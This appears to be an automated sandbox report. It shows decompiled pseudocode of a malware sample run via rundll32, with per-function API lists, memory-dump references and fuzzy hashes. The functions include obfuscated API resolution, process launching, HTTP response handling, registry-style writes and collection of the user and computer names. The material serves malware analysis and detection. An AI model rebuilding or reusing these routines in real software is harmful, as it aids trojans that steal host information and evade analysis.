                    					_t18 = _t47 + 0x421b3e6; // 0x73797325
                    					_t68 = E04211E10(_t18);
                    					if(_t68 == 0) {
                    						_v8 = 8;
                    					} else {
                    						_t50 =  *0x421a320; // 0x87d5a8
                    						_t19 = _t50 + 0x421b747; // 0x4a98cef
                    						_t20 = _t50 + 0x421b0af; // 0x4e52454b
                    						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                    						if(_t71 == 0) {
                    							_v8 = 0x7f;
                    						} else {
                    							_v108 = 0x44;
                    							E04216381();
                    							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                    							_push(1);
                    							E04216381();
                    							if(_t58 == 0) {
                    								_v8 = GetLastError();
                    							} else {
                    								CloseHandle(_v28);
                    								CloseHandle(_v32);
                    							}
                    						}
                    						HeapFree( *0x421a2d8, 0, _t68);
                    					}
                    				}
                    				_t70 = _v16;
                    				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                    				E042117AB(_t70);
                    				goto L12;
                    			}

                    APIs
                      • Part of subcall function 0421624F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04211986,?,?,?,?,00000000,00000000), ref: 04216274
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04216296
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 042162AC
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 042162C2
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 042162D8
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 042162EE
                    • memset.NTDLL ref: 042119D4
                      • Part of subcall function 04211E10: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,042119ED,73797325), ref: 04211E21
                      • Part of subcall function 04211E10: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04211E3B
                    • GetModuleHandleA.KERNEL32(4E52454B,04A98CEF,73797325), ref: 04211A0A
                    • GetProcAddress.KERNEL32(00000000), ref: 04211A11
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04211A79
                      • Part of subcall function 04216381: GetProcAddress.KERNEL32(36776F57,0421793C), ref: 0421639C
                    • CloseHandle.KERNEL32(00000000,00000001), ref: 04211A56
                    • CloseHandle.KERNEL32(?), ref: 04211A5B
                    • GetLastError.KERNEL32(00000001), ref: 04211A5F
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                    • String ID: Ut
                    • API String ID: 3075724336-8415677
                    • Opcode ID: 2b238d34080d3f78c17580cce69ebb99ed0b2d0a449fdc73b819eaa274158aae
                    • Instruction ID: 65e076ff26fb57a0cc974c4addf2d80dbbf4bb17971043db3d8880266097262e
                    • Opcode Fuzzy Hash: 2b238d34080d3f78c17580cce69ebb99ed0b2d0a449fdc73b819eaa274158aae
                    • Instruction Fuzzy Hash: B83132B5E10219AFDB109FA4DC88DAEBFFCEB18344F004566E605A7120DB75AE55CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 43%
                    			E0421266A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				intOrPtr _v32;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t58;
                    				signed int _t60;
                    				signed int _t62;
                    				intOrPtr _t64;
                    				intOrPtr _t66;
                    				intOrPtr _t70;
                    				void* _t72;
                    				void* _t75;
                    				void* _t76;
                    				intOrPtr _t80;
                    				WCHAR* _t83;
                    				void* _t84;
                    				void* _t85;
                    				void* _t86;
                    				intOrPtr _t92;
                    				intOrPtr* _t102;
                    				signed int _t103;
                    				void* _t104;
                    				intOrPtr _t105;
                    				void* _t107;
                    				intOrPtr* _t115;
                    				void* _t119;
                    				intOrPtr _t125;
                    
                    				_t58 =  *0x421a3dc; // 0x4a99c00
                    				_v24 = _t58;
                    				_v28 = 8;
                    				_v20 = GetTickCount();
                    				_t60 = E04212E72();
                    				_t103 = 5;
                    				_t98 = _t60 % _t103 + 6;
                    				_t62 = E04212E72();
                    				_t117 = _t62 % _t103 + 6;
                    				_v32 = _t62 % _t103 + 6;
                    				_t64 = E04212F7B(_t60 % _t103 + 6);
                    				_v16 = _t64;
                    				if(_t64 != 0) {
                    					_t66 = E04212F7B(_t117);
                    					_v12 = _t66;
                    					if(_t66 != 0) {
                    						_push(5);
                    						_t104 = 0xa;
                    						_t119 = E04211289(_t104,  &_v20);
                    						if(_t119 == 0) {
                    							_t119 = 0x421918c;
                    						}
                    						_t70 = E04211DDD(_v24);
                    						_v8 = _t70;
                    						if(_t70 != 0) {
                    							_t115 = __imp__;
                    							_t72 =  *_t115(_t119);
                    							_t75 =  *_t115(_v8);
                    							_t76 =  *_t115(_a4);
                    							_t80 = E042163FD(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                    							_v24 = _t80;
                    							if(_t80 != 0) {
                    								_t105 =  *0x421a320; // 0x87d5a8
                    								_t102 =  *0x421a134; // 0x4217ca9
                    								_t28 = _t105 + 0x421bb08; // 0x530025
                    								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                    								_push(4);
                    								_t107 = 5;
                    								_t83 = E04211289(_t107,  &_v20);
                    								_a8 = _t83;
                    								if(_t83 == 0) {
                    									_a8 = 0x4219190;
                    								}
                    								_t84 =  *_t115(_a8);
                    								_t85 =  *_t115(_v8);
                    								_t86 =  *_t115(_a4);
                    								_t125 = E042163FD(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                    								if(_t125 == 0) {
                    									E042117AB(_v24);
                    								} else {
                    									_t92 =  *0x421a320; // 0x87d5a8
                    									_t44 = _t92 + 0x421bc80; // 0x73006d
                    									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                    									 *_a16 = _v24;
                    									_v28 = _v28 & 0x00000000;
                    									 *_a20 = _t125;
                    								}
                    							}
                    							E042117AB(_v8);
                    						}
                    						E042117AB(_v12);
                    					}
                    					E042117AB(_v16);
                    				}
                    				return _v28;
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 04212682
                    • lstrlen.KERNEL32(00000000,00000005), ref: 04212703
                    • lstrlen.KERNEL32(?), ref: 04212714
                    • lstrlen.KERNEL32(00000000), ref: 0421271B
                    • lstrlenW.KERNEL32(80000002), ref: 04212722
                    • lstrlen.KERNEL32(?,00000004), ref: 0421278B
                    • lstrlen.KERNEL32(?), ref: 04212794
                    • lstrlen.KERNEL32(?), ref: 0421279B
                    • lstrlenW.KERNEL32(?), ref: 042127A2
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$CountFreeHeapTick
                    • String ID:
                    • API String ID: 2535036572-0
                    • Opcode ID: cdc95e4706754152f525d6bce8e808aea2e9598e48a634a2664a3845d16a31ac
                    • Instruction ID: cb40f41607f034dcb904f79a8a872f4deb19be800a8a41732e2a4c1ef60292c6
                    • Opcode Fuzzy Hash: cdc95e4706754152f525d6bce8e808aea2e9598e48a634a2664a3845d16a31ac
                    • Instruction Fuzzy Hash: 71517072E00119EFDF11AFA4DC48AAE7BF5EF58314F0540A5F904A7260DB35AE21DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E042158EE(void* __ecx, void* __esi) {
                    				long _v8;
                    				long _v12;
                    				long _v16;
                    				long _v20;
                    				long _t34;
                    				long _t39;
                    				long _t42;
                    				long _t56;
                    				void* _t58;
                    				void* _t59;
                    				void* _t61;
                    
                    				_t61 = __esi;
                    				_t59 = __ecx;
                    				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                    				do {
                    					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                    					_v20 = _t34;
                    					if(_t34 != 0) {
                    						L3:
                    						_v8 = 4;
                    						_v16 = 0;
                    						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                    							_t39 = GetLastError();
                    							_v12 = _t39;
                    							if(_v20 == 0 || _t39 != 0x2ef3) {
                    								L15:
                    								return _v12;
                    							} else {
                    								goto L11;
                    							}
                    						}
                    						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                    							goto L11;
                    						} else {
                    							_v16 = 0;
                    							_v8 = 0;
                    							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                    							_t58 = E042163FD(_v8 + 1);
                    							if(_t58 == 0) {
                    								_v12 = 8;
                    							} else {
                    								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                    									E042117AB(_t58);
                    									_v12 = GetLastError();
                    								} else {
                    									 *((char*)(_t58 + _v8)) = 0;
                    									 *(_t61 + 0xc) = _t58;
                    								}
                    							}
                    							goto L15;
                    						}
                    					}
                    					SetEvent( *(_t61 + 0x1c));
                    					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                    					_v12 = _t56;
                    					if(_t56 != 0) {
                    						goto L15;
                    					}
                    					goto L3;
                    					L11:
                    					_t42 = E04215867( *(_t61 + 0x1c), _t59, 0xea60);
                    					_v12 = _t42;
                    				} while (_t42 == 0);
                    				goto L15;
                    			}

                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04215905
                    • SetEvent.KERNEL32(?), ref: 04215915
                    • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04215947
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0421596C
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0421598C
                    • GetLastError.KERNEL32 ref: 0421599E
                      • Part of subcall function 04215867: WaitForMultipleObjects.KERNEL32(00000002,04217AF8,00000000,04217AF8,?,?,?,04217AF8,0000EA60), ref: 04215882
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • GetLastError.KERNEL32(00000000), ref: 042159D3
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                    • String ID:
                    • API String ID: 3369646462-0
                    • Opcode ID: 1a04b9b33aa5a7734c776eda01db4a989595a04d75556bda70af840a9840a485
                    • Instruction ID: 532468bd04b8e20b8234b2c7f771c1fa01070f63ece7477dac2d5283f7fa01e0
                    • Opcode Fuzzy Hash: 1a04b9b33aa5a7734c776eda01db4a989595a04d75556bda70af840a9840a485
                    • Instruction Fuzzy Hash: 19314FB1A10309FFDB20DF95C9849AEB7F8EB58310F1045AAE541E2160E731EA84DF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SysAllocString.OLEAUT32(00000000), ref: 04214D03
                    • SysAllocString.OLEAUT32(0070006F), ref: 04214D17
                    • SysAllocString.OLEAUT32(00000000), ref: 04214D29
                    • SysFreeString.OLEAUT32(00000000), ref: 04214D8D
                    • SysFreeString.OLEAUT32(00000000), ref: 04214D9C
                    • SysFreeString.OLEAUT32(00000000), ref: 04214DA7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: 32833e0163dff3bd452280df03f8be777bf93ae8212d5389129e4a638672d67f
                    • Instruction ID: 6d5ca2f7e564a450308610ad4bc30c4ea2d7ca67f7f181cea3555e321ff6a8cc
                    • Opcode Fuzzy Hash: 32833e0163dff3bd452280df03f8be777bf93ae8212d5389129e4a638672d67f
                    • Instruction Fuzzy Hash: 12313D32E10609AFDF01EFACD848A9FB7F6AF59304F144465E914EB120DB76AD06CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0421624F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                    				intOrPtr _v8;
                    				intOrPtr _t23;
                    				intOrPtr _t26;
                    				_Unknown_base(*)()* _t28;
                    				intOrPtr _t30;
                    				_Unknown_base(*)()* _t32;
                    				intOrPtr _t33;
                    				_Unknown_base(*)()* _t35;
                    				intOrPtr _t36;
                    				_Unknown_base(*)()* _t38;
                    				intOrPtr _t39;
                    				_Unknown_base(*)()* _t41;
                    				intOrPtr _t44;
                    				struct HINSTANCE__* _t48;
                    				intOrPtr _t54;
                    
                    				_t54 = E042163FD(0x20);
                    				if(_t54 == 0) {
                    					_v8 = 8;
                    				} else {
                    					_t23 =  *0x421a320; // 0x87d5a8
                    					_t1 = _t23 + 0x421b11a; // 0x4c44544e
                    					_t48 = GetModuleHandleA(_t1);
                    					_t26 =  *0x421a320; // 0x87d5a8
                    					_t2 = _t26 + 0x421b769; // 0x7243775a
                    					_v8 = 0x7f;
                    					_t28 = GetProcAddress(_t48, _t2);
                    					 *(_t54 + 0xc) = _t28;
                    					if(_t28 == 0) {
                    						L8:
                    						E042117AB(_t54);
                    					} else {
                    						_t30 =  *0x421a320; // 0x87d5a8
                    						_t5 = _t30 + 0x421b756; // 0x614d775a
                    						_t32 = GetProcAddress(_t48, _t5);
                    						 *(_t54 + 0x10) = _t32;
                    						if(_t32 == 0) {
                    							goto L8;
                    						} else {
                    							_t33 =  *0x421a320; // 0x87d5a8
                    							_t7 = _t33 + 0x421b40b; // 0x6e55775a
                    							_t35 = GetProcAddress(_t48, _t7);
                    							 *(_t54 + 0x14) = _t35;
                    							if(_t35 == 0) {
                    								goto L8;
                    							} else {
                    								_t36 =  *0x421a320; // 0x87d5a8
                    								_t9 = _t36 + 0x421b4d2; // 0x4e6c7452
                    								_t38 = GetProcAddress(_t48, _t9);
                    								 *(_t54 + 0x18) = _t38;
                    								if(_t38 == 0) {
                    									goto L8;
                    								} else {
                    									_t39 =  *0x421a320; // 0x87d5a8
                    									_t11 = _t39 + 0x421b779; // 0x6c43775a
                    									_t41 = GetProcAddress(_t48, _t11);
                    									 *(_t54 + 0x1c) = _t41;
                    									if(_t41 == 0) {
                    										goto L8;
                    									} else {
                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                    										_t44 = E0421462B(_t54, _a8);
                    										_v8 = _t44;
                    										if(_t44 != 0) {
                    											goto L8;
                    										} else {
                    											 *_a12 = _t54;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v8;
                    			}

                    APIs
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04211986,?,?,?,?,00000000,00000000), ref: 04216274
                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04216296
                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 042162AC
                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 042162C2
                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 042162D8
                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 042162EE
                      • Part of subcall function 0421462B: memset.NTDLL ref: 042146AA
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateHandleHeapModulememset
                    • String ID:
                    • API String ID: 1886625739-0
                    • Opcode ID: 31aee8eadb5ed2b26e1c6c177142ac3000bdfa22776cb3c1f4faf30fc1de8ff6
                    • Instruction ID: 97baabad6421750f731a5a63fefa409d075c3e772befd1ef0d6d4d784d813b1d
                    • Opcode Fuzzy Hash: 31aee8eadb5ed2b26e1c6c177142ac3000bdfa22776cb3c1f4faf30fc1de8ff6
                    • Instruction Fuzzy Hash: 96216DB171124AAFD710DF68D888E5EBBFCEB28B54B054465E909C7220E739FD06CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E04212B1E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                    				signed int _v8;
                    				char _v12;
                    				signed int* _v16;
                    				char _v284;
                    				void* __esi;
                    				char* _t59;
                    				intOrPtr* _t60;
                    				intOrPtr _t64;
                    				char _t65;
                    				intOrPtr _t68;
                    				intOrPtr _t69;
                    				intOrPtr _t71;
                    				void* _t73;
                    				signed int _t81;
                    				void* _t91;
                    				void* _t92;
                    				char _t98;
                    				signed int* _t100;
                    				intOrPtr* _t101;
                    				void* _t102;
                    
                    				_t92 = __ecx;
                    				_v8 = _v8 & 0x00000000;
                    				_t98 = _a16;
                    				if(_t98 == 0) {
                    					__imp__( &_v284,  *0x421a3dc);
                    					_t91 = 0x80000002;
                    					L6:
                    					_t59 = E04215406( &_v284,  &_v284);
                    					_a8 = _t59;
                    					if(_t59 == 0) {
                    						_v8 = 8;
                    						L29:
                    						_t60 = _a20;
                    						if(_t60 != 0) {
                    							 *_t60 =  *_t60 + 1;
                    						}
                    						return _v8;
                    					}
                    					_t101 = _a24;
                    					if(E04217488(_t92, _t97, _t101, _t91, _t59) != 0) {
                    						L27:
                    						E042117AB(_a8);
                    						goto L29;
                    					}
                    					_t64 =  *0x421a318; // 0x4a99d58
                    					_t16 = _t64 + 0xc; // 0x4a99e7a
                    					_t65 = E04215406(_t64,  *_t16);
                    					_a24 = _t65;
                    					if(_t65 == 0) {
                    						L14:
                    						_t29 = _t101 + 0x14; // 0x102
                    						_t33 = _t101 + 0x10; // 0x3d042190
                    						if(E04215B98(_t97,  *_t33, _t91, _a8,  *0x421a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                    							_t68 =  *0x421a320; // 0x87d5a8
                    							if(_t98 == 0) {
                    								_t35 = _t68 + 0x421ba3f; // 0x4d4c4b48
                    								_t69 = _t35;
                    							} else {
                    								_t34 = _t68 + 0x421b8e7; // 0x55434b48
                    								_t69 = _t34;
                    							}
                    							if(E0421266A(_t69,  *0x421a3d4,  *0x421a3d8,  &_a24,  &_a16) == 0) {
                    								if(_t98 == 0) {
                    									_t71 =  *0x421a320; // 0x87d5a8
                    									_t44 = _t71 + 0x421b846; // 0x74666f53
                    									_t73 = E04215406(_t44, _t44);
                    									_t99 = _t73;
                    									if(_t73 == 0) {
                    										_v8 = 8;
                    									} else {
                    										_t47 = _t101 + 0x10; // 0x3d042190
                    										E042134EE( *_t47, _t91, _a8,  *0x421a3d8, _a24);
                    										_t49 = _t101 + 0x10; // 0x3d042190
                    										E042134EE( *_t49, _t91, _t99,  *0x421a3d0, _a16);
                    										E042117AB(_t99);
                    									}
                    								} else {
                    									_t40 = _t101 + 0x10; // 0x3d042190
                    									E042134EE( *_t40, _t91, _a8,  *0x421a3d8, _a24);
                    									_t43 = _t101 + 0x10; // 0x3d042190
                    									E042134EE( *_t43, _t91, _a8,  *0x421a3d0, _a16);
                    								}
                    								if( *_t101 != 0) {
                    									E042117AB(_a24);
                    								} else {
                    									 *_t101 = _a16;
                    								}
                    							}
                    						}
                    						goto L27;
                    					}
                    					_t21 = _t101 + 0x10; // 0x3d042190
                    					_t81 = E04211BC5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                    					if(_t81 == 0) {
                    						_t100 = _v16;
                    						if(_v12 == 0x28) {
                    							 *_t100 =  *_t100 & _t81;
                    							_t26 = _t101 + 0x10; // 0x3d042190
                    							E04215B98(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                    						}
                    						E042117AB(_t100);
                    						_t98 = _a16;
                    					}
                    					E042117AB(_a24);
                    					goto L14;
                    				}
                    				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                    					goto L29;
                    				} else {
                    					_t97 = _a8;
                    					E04217961(_t98, _a8,  &_v284);
                    					__imp__(_t102 + _t98 - 0x117,  *0x421a3dc);
                    					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                    					_t91 = 0x80000003;
                    					goto L6;
                    				}
                    			}

                    APIs
                    • StrChrA.SHLWAPI(04211850,0000005F,00000000,00000000,00000104), ref: 04212B51
                    • lstrcpy.KERNEL32(?,?), ref: 04212B7E
                      • Part of subcall function 04215406: lstrlen.KERNEL32(?,00000000,04A99D58,00000000,04213C77,04A99F7B,69B25F44,?,?,?,?,69B25F44,00000005,0421A00C,4D283A53,?), ref: 0421540D
                      • Part of subcall function 04215406: mbstowcs.NTDLL ref: 04215436
                      • Part of subcall function 04215406: memset.NTDLL ref: 04215448
                      • Part of subcall function 042134EE: lstrlenW.KERNEL32(?,?,?,04212CE7,3D042190,80000002,04211850,04215F20,74666F53,4D4C4B48,04215F20,?,3D042190,80000002,04211850,?), ref: 04213513
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • lstrcpy.KERNEL32(?,00000000), ref: 04212BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                    • String ID: ($\
                    • API String ID: 3924217599-1512714803
                    • Opcode ID: 74a738a6f4ab219cbd12597ea17e5e7276fc357e1472a5b2b507b742f42c9844
                    • Instruction ID: e0df1e2e59a3c7acc0f212a9e0610f1b613bea24452babb425387cc6ffcc3995
                    • Opcode Fuzzy Hash: 74a738a6f4ab219cbd12597ea17e5e7276fc357e1472a5b2b507b742f42c9844
                    • Instruction Fuzzy Hash: 2351507532020AEFDF229F54EC44EAA77F9EF68344F108454FA15A2170D735E955DB20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E04214DFF() {
                    				void* _v0;
                    				void** _t3;
                    				void** _t5;
                    				void** _t7;
                    				void** _t8;
                    				void* _t10;
                    
                    				_t3 =  *0x421a3cc; // 0x4a995b0
                    				__imp__( &(_t3[0x10]));
                    				while(1) {
                    					_t5 =  *0x421a3cc; // 0x4a995b0
                    					_t1 =  &(_t5[0x16]); // 0x0
                    					if( *_t1 == 0) {
                    						break;
                    					}
                    					Sleep(0xa);
                    				}
                    				_t7 =  *0x421a3cc; // 0x4a995b0
                    				_t10 =  *_t7;
                    				if(_t10 != 0 && _t10 != 0x421b81a) {
                    					HeapFree( *0x421a2d8, 0, _t10);
                    					_t7 =  *0x421a3cc; // 0x4a995b0
                    				}
                    				 *_t7 = _v0;
                    				_t8 =  &(_t7[0x10]);
                    				__imp__(_t8);
                    				return _t8;
                    			}

                    APIs
                    • RtlEnterCriticalSection.NTDLL(04A99570), ref: 04214E08
                    • Sleep.KERNEL32(0000000A), ref: 04214E12
                    • HeapFree.KERNEL32(00000000), ref: 04214E40
                    • RtlLeaveCriticalSection.NTDLL(04A99570), ref: 04214E55
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: edccfb42d2c8e9f6d8724dfb5efca74c2553f2a1606e9657276e0db51b0554b0
                    • Instruction ID: 777a572a26a097af8a0359911d16149b8dd1c1b56d15e59f9f163d4888a89b0b
                    • Opcode Fuzzy Hash: edccfb42d2c8e9f6d8724dfb5efca74c2553f2a1606e9657276e0db51b0554b0
                    • Instruction Fuzzy Hash: 99F0D4B47512029FEB189F58F99DB26B7F5EB74701B05801AE806D72B0CA38EC80CA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04214B71() {
                    				long _v8;
                    				long _v12;
                    				int _v16;
                    				long _t39;
                    				long _t43;
                    				signed int _t47;
                    				signed int _t52;
                    				int _t56;
                    				int _t57;
                    				char* _t63;
                    				short* _t66;
                    
                    				_v16 = 0;
                    				_v8 = 0;
                    				GetUserNameW(0,  &_v8);
                    				_t39 = _v8;
                    				if(_t39 != 0) {
                    					_v12 = _t39;
                    					_v8 = 0;
                    					GetComputerNameW(0,  &_v8);
                    					_t43 = _v8;
                    					if(_t43 != 0) {
                    						_v12 = _v12 + _t43 + 2;
                    						_t63 = E042163FD(_v12 + _t43 + 2 << 2);
                    						if(_t63 != 0) {
                    							_t47 = _v12;
                    							_t66 = _t63 + _t47 * 2;
                    							_v8 = _t47;
                    							if(GetUserNameW(_t66,  &_v8) == 0) {
                    								L7:
                    								E042117AB(_t63);
                    							} else {
                    								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                    								_t52 = _v8;
                    								_v12 = _v12 - _t52;
                    								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                    									goto L7;
                    								} else {
                    									_t56 = _v12 + _v8;
                    									_v12 = _t56;
                    									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
                    									_v8 = _t57;
                    									if(_t57 == 0) {
                    										goto L7;
                    									} else {
                    										_t63[_t57] = 0;
                    										_v16 = _t63;
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v16;
                    			}

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04214B85
                    • GetComputerNameW.KERNEL32(00000000,?), ref: 04214BA1
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04214BDB
                    • GetComputerNameW.KERNEL32(?,?), ref: 04214BFD
